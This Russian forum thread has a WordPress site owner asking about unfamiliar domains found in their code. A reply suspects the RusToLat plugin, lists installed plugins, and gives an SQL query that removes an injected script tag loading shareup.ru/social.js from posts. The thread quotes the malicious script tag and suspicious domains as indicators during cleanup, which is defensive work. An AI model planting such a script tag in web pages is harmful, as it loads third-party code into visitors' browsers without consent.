• Сегодня встретил в коде uptoliked.ru, css.googleaps.ru, wq4.ru, shareup.ru/social.js что это?

    @setevoy4
    Столкнулся с тем же:
    shareup.ru || social.js

    Вычистил один раз - заметил снова.
    Есть подозрение на RusToLat плагин.
    Отключил, посмотрю через пару дней еще.

    У меня установлены:

    about-author
    all-in-one-seo-pack
    autoset-featured-image
    clean-and-simple-contact-form-by-meg-nicholas
    disqus-comment-system
    dynamic-to-top
    google-sitemap-generator
    html-editor-syntax-highlighter
    index.php
    rating-widget
    rustolat
    sitemap-generator
    social-networks-auto-poster-facebook-twitter-g
    syntax-highlighter-with-add-button-in-editor
    wordpress-23-related-posts-plugin
    wordpress-importer
    wp-autoset-featured-image-plus
    wp-noexternallinks
    wp-postviews
    wp-to-twitter
    yet-another-stars-rating


    Лечил простым запросом:

    UPDATE db1_posts SET post_content = REPLACE(post_content, '<script type="text/javascript" src="//shareup.ru/social.js"></script>', '') WHERE post_content LIKE '%src="//shareup.ru/social.js"></script>%';
    Ответ написан